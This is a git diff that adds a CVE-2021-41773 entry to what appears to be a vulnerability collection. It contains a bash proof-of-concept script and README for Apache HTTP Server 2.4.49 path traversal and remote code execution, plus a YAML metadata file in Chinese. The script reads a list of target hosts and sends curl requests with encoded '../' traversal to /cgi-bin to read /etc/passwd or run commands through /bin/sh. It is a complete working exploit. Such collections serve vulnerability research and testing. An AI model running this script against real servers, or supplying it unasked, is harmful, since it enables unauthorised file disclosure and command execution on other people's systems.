diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
new file mode 100644
index 0000000000000000000000000000000000000000..2546e27094b9df45701b2f81ec6411592ffbaf56
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh	
@@ -0,0 +1,22 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage:  https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d4d6131327c1b67e68d3f021ce3855c7bf6b1270
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md	
@@ -0,0 +1,27 @@
+# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)  
+Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)  
+Date: 10/05/2021  
+Exploit Author: Lucas Souza https://lsass.io  
+Vendor Homepage:  https://apache.org/  
+Version: 2.4.49  
+Tested on: 2.4.49  
+CVE : CVE-2021-41773  
+Credits: Ash Daulton and the cPanel Security Team  
+```
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+```
+# Usage
+```
+PoC.sh targets.txt /etc/passwd 
+PoC.sh targets.txt /bin/sh whoami 
+```
+
diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..420c8e1ab6814c866fecaad854fb073109fa4590
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml	
@@ -0,0 +1,27 @@
+id: CVE-2021-41773
+source: https://www.exploit-db.com/exploits/50383
+info:
+  name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。
+  severity: critical
+  description:
+    2021年10月8日Apache HTTPd官方发布安全更新，披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞，可以读取到Apache服务器web目录以外的其他文件，或读取web中的脚本源码，如果服务器开启CGI或cgid服务，攻击者可进行任意代码执行。
+  scope-of-influence:
+    Apache HTTP Server =  2.4.49
+  reference:
+    - https://apache.org/
+    - https://www.exploit-db.com/exploits/50383
+    - https://blog.csdn.net/qq_48985780/article/details/120973100
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html
+    - http://www.openwall.com/lists/oss-security/2021/10/08/1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-41773
+    cwe-id: CWE-22
+    cnvd-id: None
+    kve-id: None
+  tags: 
+    - Apache HTTP Serve
+    - 路径穿越
+    - 任意文件读取